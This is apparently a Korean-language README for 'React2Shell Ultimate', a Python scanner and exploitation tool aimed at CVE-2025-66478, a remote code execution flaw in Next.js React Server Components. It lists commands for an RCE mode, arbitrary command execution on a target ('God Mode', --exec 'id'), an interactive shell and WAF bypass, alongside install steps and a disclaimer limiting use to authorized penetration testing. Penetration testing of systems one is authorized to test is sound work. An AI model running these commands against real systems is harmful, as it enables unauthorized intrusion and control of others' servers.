
여러 스캔 모드, WAF 우회, 대화형 셸, 승인된 침투 테스트를 위한 배치 스캔을 지원하는 Next.js RSC RCE 취약점 스캐너입니다.
CVE-2025-66478 대상 전문 Next.js RSC RCE 취약점 스캐너
React2Shell Ultimate는 React Server Components(RSC)를 사용하는 Next.js 애플리케이션에 영향을 미치는 중요 원격 코드 실행(RCE) 취약점인 CVE-2025-66478을 위한 종합 취약점 스캐너입니다.
버전 2.0은 주요 개선 사항과 전문 기능을 제공합니다:
# Basic scan
python3 react2shell-ultimate.py -u https://target.com
# RCE mode
python3 react2shell-ultimate.py -u https://target.com --mode rce
# Execute command (God Mode)
python3 react2shell-ultimate.py -u https://target.com --exec "id"
# Interactive shell
python3 react2shell-ultimate.py -u https://target.com --shell
# Clone the repository
git clone https://github.com/hackersatyamrastogi/react2shell-ultimate.git
cd react2shell-ultimate
# Install dependencies
pip3 install -r requirements.txt
# Make the script executable
chmod +x react2shell-ultimate.py
# Verify installation
python3 react2shell-ultimate.py --version
요구 사항:
전문 웹 인터페이스를 통해 React2Shell Ultimate을 경험하세요:
웹 기능:
승인된 보안 테스트 전용
이 도구는 다음 용도로 설계되었습니다:
이 도구의 오용에 대한 모든 책임은 사용자에게 있습니다.
Satyam Rastogi